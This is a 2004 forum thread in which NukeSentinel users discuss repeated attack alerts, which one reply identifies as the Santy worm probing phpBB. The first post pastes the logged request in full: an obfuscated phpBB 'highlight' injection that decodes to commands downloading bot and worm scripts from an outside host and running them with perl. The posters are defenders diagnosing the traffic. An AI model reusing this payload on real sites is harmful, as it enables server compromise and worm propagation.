Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
SPJeff69
Regular
Regular



Joined: Oct 25, 2004
Posts: 53

PostPosted: Fri Dec 24, 2004 1:49 am Reply with quote

Starting at about 1245 am, I started getting emails from NukeSentinel about Abuse-Script. No big deal.

However, I am still receiving emails now, probably more than 30.
The IP Address changes, but the URL doesn't. Let me provide it for you.

The user agent is always: User Agent: lwp-trivial/1.xx (xx changes)
What is LWP-Trivial, and what the heck is the guy trying to do?

Code:
Query String: site.com/modules.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527


EDIT: In the time it took me to write that, I received 2 more emails.
 
View user's profile Send private message
takaharu
Client



Joined: Sep 25, 2003
Posts: 58

PostPosted: Fri Dec 24, 2004 6:35 am Reply with quote

Hi ,

I had the same on my phpBB standalone. Been trying all morning to figure out what it was. I added a piece of code to my htaccess and it disappeared. Seems to be a harvesting script.

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website
SPJeff69







PostPosted: Fri Dec 24, 2004 8:43 am Reply with quote

Ok, so I Deny from all, for a few hours. Wake up, and the emails start poring in. What the hell is going on?
 
BohrMe
Hangin' Around



Joined: May 01, 2004
Posts: 28
Location: Fall River, MA

PostPosted: Fri Dec 24, 2004 9:03 am Reply with quote

This is simply the Sanity worm trying to get into your site via the phpBB forum. Do a search through the forums here for the worm and you'll find some good advice.

_________________
BohrMe
eSnider.net 
View user's profile Send private message Visit poster's website
Mesum
Useless



Joined: Aug 23, 2002
Posts: 213
Location: Chicago

PostPosted: Fri Dec 24, 2004 12:17 pm Reply with quote

I have been bombed by those strings since last few days too but so far they haven't have any success.

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©